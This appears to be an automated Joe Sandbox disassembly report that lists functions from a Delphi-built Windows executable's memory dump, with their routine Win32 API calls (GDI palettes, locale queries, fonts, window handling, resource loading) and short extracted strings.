Part of subcall function 0041E5DC: GetSysColor.USER32 ref: 0041E5E6

SetBkColor.GDI32(?,00000000), ref: 0041FC7B
SetBkMode.GDI32(?,00000001), ref: 0041FC86

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0040A328, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107

APIs

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A4E3), ref: 0040A393
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A4E3), ref: 0040A3B5

Strings

s@, xrefs: 0040A438
t|@, xrefs: 0040A44A, 0040A4A6
4s@, xrefs: 0040A494

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00409CD8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CF5
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D19
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D34
LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DCA

Strings

Ts@, xrefs: 00409DB6

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00403340, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403362
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004033B1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403395
RegCloseKey.ADVAPI32(?,004033B8,00000000,?,00000004,00000000,004033B1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004033AB

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 00403358
FPUMaskValue, xrefs: 0040338C

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00456928, Relevance: 7.6, APIs: 5, Instructions: 73

APIs

GetCapture.USER32(?,?,0045BD1C,00000001,00456AEB,?,?,?,0045BD1C), ref: 0045694B
GetParent.USER32(00000000), ref: 00456971

Part of subcall function 00433EA4: GlobalFindAtomA.KERNEL32(00000000), ref: 00433EB8
Part of subcall function 00433EA4: GetPropA.USER32(00000000,00000000), ref: 00433ECF

SendMessageA.USER32(00000000,-0000BBEE,0045BD1C,?), ref: 0045699F
GetWindowLongA.USER32(00000000,000000FA), ref: 004569AF
SendMessageA.USER32(00000000,-0000BBEE,0045BD1C,?), ref: 004569CE

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00424420, Relevance: 7.6, APIs: 5, Instructions: 66

APIs

Part of subcall function 00420530: CreateCompatibleDC.GDI32(00000000), ref: 00420549
Part of subcall function 00420530: SelectObject.GDI32(00000000), ref: 00420552
Part of subcall function 00420530: GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 00420566
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420572
Part of subcall function 00420530: DeleteDC.GDI32(00000000), ref: 00420578
Part of subcall function 00420530: CreatePalette.GDI32 ref: 004205BE

GetDC.USER32(00000000), ref: 00424476
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
CreateHalftonePalette.GDI32(00000000), ref: 004244B9
ReleaseDC.USER32(00000000,00000000), ref: 004244C4

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00420498, Relevance: 7.6, APIs: 5, Instructions: 55

APIs

GetDC.USER32(00000000), ref: 004204B0
GetDeviceCaps.GDI32(?,00000068), ref: 004204CC
GetPaletteEntries.GDI32(070806DB,00000000,00000008,?), ref: 004204E4
GetPaletteEntries.GDI32(070806DB,00000008,00000008,?), ref: 004204FC
ReleaseDC.USER32(00000000,?), ref: 00420518

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004099F4, Relevance: 7.6, APIs: 5, Instructions: 50

APIs

GetThreadLocale.KERNEL32(?,00000000,00409A8B,?,?,00000000), ref: 00409A0C

Part of subcall function 0040976C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409A8B,?,?,00000000), ref: 00409A3C
EnumCalendarInfoA.KERNEL32(Function_00009940,00000000,00000000,00000004), ref: 00409A47
GetThreadLocale.KERNEL32(00000000,00000003,Function_00009940,00000000,00000000,00000004,00000000,00409A8B,?,?,00000000), ref: 00409A65
EnumCalendarInfoA.KERNEL32(0040997C,00000000,00000000,00000003), ref: 00409A70

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00455684, Relevance: 7.5, APIs: 5, Instructions: 25

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 00455693
SetEvent.KERNEL32(00000000,0045792E,00000000,00456A0B,?,?,0045BD1C,00000001,00456ACB,?,?,?,0045BD1C), ref: 004556AE
GetCurrentThreadId.KERNEL32(00000000,0045792E,00000000,00456A0B,?,?,0045BD1C,00000001,00456ACB,?,?,?,0045BD1C), ref: 004556B3
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004556C8
CloseHandle.KERNEL32(00000000), ref: 004556D3

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00425130, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 203

APIs

Part of subcall function 0042429C: GetObjectA.GDI32(?,00000054,?), ref: 004242C2

SelectObject.GDI32(?,?), ref: 0042522C
GetDIBColorTable.GDI32(?,00000000,00000100,?), ref: 0042524D
SelectObject.GDI32(?,?), ref: 00425262

Part of subcall function 004205D4: GetObjectA.GDI32(?,00000004), ref: 004205EB
Part of subcall function 004205D4: GetPaletteEntries.GDI32(?,00000000,?), ref: 0042060E

Strings

BM, xrefs: 00425208

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00409AA3, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148

APIs

GetThreadLocale.KERNEL32(?,00000000,00409C6E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409AD3

Part of subcall function 0040976C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

Strings

ggg, xrefs: 00409BB8
eeee, xrefs: 00409BDE
yyyy, xrefs: 00409BC5

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004573BC, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80

APIs

Part of subcall function 00457338: GetCursorPos.USER32 ref: 00457341

GetCurrentThreadId.KERNEL32(00000000,004574CA,?,?,?,0045BD1C), ref: 00457488
WaitMessage.USER32 ref: 004574AA

Part of subcall function 0041B680: GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B689
Part of subcall function 0041B680: GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B698
Part of subcall function 0041B680: RtlEnterCriticalSection.KERNEL32(00464A04,?,?,00000000), ref: 0041B6D3
Part of subcall function 0041B680: SetEvent.KERNEL32(?,?,00464A04,?,?,00000000), ref: 0041B767
Part of subcall function 0041B680: RtlLeaveCriticalSection.KERNEL32(00464A04,0041B7A1,00464A04,?,?,00000000), ref: 0041B790

Part of subcall function 004572D4: IsWindowVisible.USER32(00000000), ref: 0045730C
Part of subcall function 004572D4: IsWindowEnabled.USER32(00000000), ref: 0045731D

Strings

0@F, xrefs: 0045748D
4kE, xrefs: 004573DE, 004573E8, 00457439, 00457461, 00457449, 0045744C, 004573F4, 004573FD

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0040B134, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040B13A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll), ref: 0040B14B

Strings

kernel32.dll, xrefs: 0040B135
GetDiskFreeSpaceExA, xrefs: 0040B145

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0040AB58, Relevance: 6.1, APIs: 4, Instructions: 95

APIs

GetThreadLocale.KERNEL32 ref: 0040AB82
GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AC4C
GetSystemMetrics.USER32(0000004A), ref: 0040AC77
GetSystemMetrics.USER32(0000002A), ref: 0040AC88

Part of subcall function 0040AAE0: GetCPInfo.KERNEL32(00000000,?), ref: 0040AAF9

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00423004, Relevance: 6.1, APIs: 4, Instructions: 83

APIs

Part of subcall function 0041F704: RtlEnterCriticalSection.KERNEL32(00464A5C,00000000,0041E16E,00000000,0041E1CD), ref: 0041F70C
Part of subcall function 0041F704: RtlLeaveCriticalSection.KERNEL32(00464A5C,00464A5C,00000000,0041E16E,00000000,0041E1CD), ref: 0041F719
Part of subcall function 0041F704: RtlEnterCriticalSection.KERNEL32(00000038,00464A5C,00464A5C,00000000,0041E16E,00000000,0041E1CD), ref: 0041F722

Part of subcall function 00424420: GetDC.USER32(00000000), ref: 00424476
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
Part of subcall function 00424420: CreateHalftonePalette.GDI32(00000000), ref: 004244B9
Part of subcall function 00424420: ReleaseDC.USER32(00000000,00000000), ref: 004244C4

CreateCompatibleDC.GDI32(00000000), ref: 00423059
SelectObject.GDI32(00000000,?), ref: 00423072
SelectPalette.GDI32(00000000,?,000000FF), ref: 0042309B
RealizePalette.GDI32(00000000), ref: 004230A7

Part of subcall function 0041F940: RtlLeaveCriticalSection.KERNEL32(00000038,00000000,0041E1BE,0041E1D4), ref: 0041F947
Part of subcall function 0041F940: RtlEnterCriticalSection.KERNEL32(00464A5C,00000038,00000000,0041E1BE,0041E1D4), ref: 0041F951
Part of subcall function 0041F940: RtlLeaveCriticalSection.KERNEL32(00464A5C,00464A5C,00000038,00000000,0041E1BE,0041E1D4), ref: 0041F95E

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00422214, Relevance: 6.1, APIs: 4, Instructions: 64

APIs

SelectPalette.GDI32(00000000,00000000,000000FF), ref: 00422242
RealizePalette.GDI32(00000000), ref: 00422251
PlayEnhMetaFile.GDI32(00000000,?,?), ref: 00422283
SelectPalette.GDI32(00000000,00000000,000000FF), ref: 00422297

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00455CF4, Relevance: 6.1, APIs: 4, Instructions: 57

APIs

EnumWindows.USER32(00455C84), ref: 00455D29
GetWindow.USER32(00000003,00000003), ref: 00455D41
GetWindowLongA.USER32(00000000,000000EC), ref: 00455D4E
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00455D8D

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004167E4, Relevance: 6.1, APIs: 4, Instructions: 51

APIs

FindResourceA.KERNEL32(?,?,?), ref: 004167FB
LoadResource.KERNEL32(?,00416584,?,?,?,00411F6C,?,00000001,00000000,?,00416754,?), ref: 00416815
SizeofResource.KERNEL32(?,00416584,?,00416584,?,?,?,00411F6C,?,00000001,00000000,?,00416754,?), ref: 0041682F
LockResource.KERNEL32(004160B0,00000000,?,00416584,?,00416584,?,?,?,00411F6C,?,00000001,00000000,?,00416754,?), ref: 00416839

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004259D0, Relevance: 6.0, APIs: 4, Instructions: 29

APIs

GetDC.USER32(00000000), ref: 004259D9
SelectObject.GDI32(00000000,018A002E), ref: 004259EB
GetTextMetricsA.GDI32(00000000), ref: 004259F6
ReleaseDC.USER32(00000000,00000000), ref: 00425A06

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004238C8, Relevance: 6.0, APIs: 4, Instructions: 27

APIs

DeleteObject.GDI32(?), ref: 004238CC
DeleteDC.GDI32(?), ref: 004238EC
ReleaseDC.USER32(00000000,?), ref: 004238F7
GetObjectA.GDI32(?,00000054,?), ref: 0042390C

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00407090, Relevance: 6.0, APIs: 4, Instructions: 11

APIs

GlobalHandle.KERNEL32 ref: 00407093
GlobalUnlock.KERNEL32(00000000), ref: 0040709A
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040709F
GlobalLock.KERNEL32(00000000), ref: 004070A5

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0041EAB0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123

APIs

Part of subcall function 0041DE34: RtlEnterCriticalSection.KERNEL32 ref: 0041DE38

Part of subcall function 004083B8: CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000), ref: 004083E5

CreateFontIndirectA.GDI32(?), ref: 0041EBEE

Part of subcall function 0041DE40: RtlLeaveCriticalSection.KERNEL32 ref: 0041DE44

Strings

Default, xrefs: 0041EB7C
MS Sans Serif, xrefs: 0041EB8D

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00425A7B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84

APIs

RtlInitializeCriticalSection.KERNEL32(?,?,?), ref: 00425AF6
RtlEnterCriticalSection.KERNEL32(?,?), ref: 00425B48

Strings

V, xrefs: 00425A7C

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004245E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72

APIs

RtlEnterCriticalSection.KERNEL32(00464A44), ref: 00424683
RtlLeaveCriticalSection.KERNEL32(00464A44,004246CE,00464A44), ref: 004246C1

Strings

DJF, xrefs: 0042462E

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004264FC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43

APIs

GetSystemMetrics.USER32(00000000), ref: 0042654D
GetSystemMetrics.USER32(00000001), ref: 00426559

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

MonitorFromRect, xrefs: 00426511

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00425A14, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 00425A21

Part of subcall function 004259D0: GetDC.USER32(00000000), ref: 004259D9
Part of subcall function 004259D0: SelectObject.GDI32(00000000,018A002E), ref: 004259EB
Part of subcall function 004259D0: GetTextMetricsA.GDI32(00000000), ref: 004259F6
Part of subcall function 004259D0: ReleaseDC.USER32(00000000,00000000), ref: 00425A06

MulDiv.KERNEL32(00000009,00000060,00000048,00000008), ref: 00425A5D

Strings

MS Sans Serif, xrefs: 00425A4A

Memory Dump Source

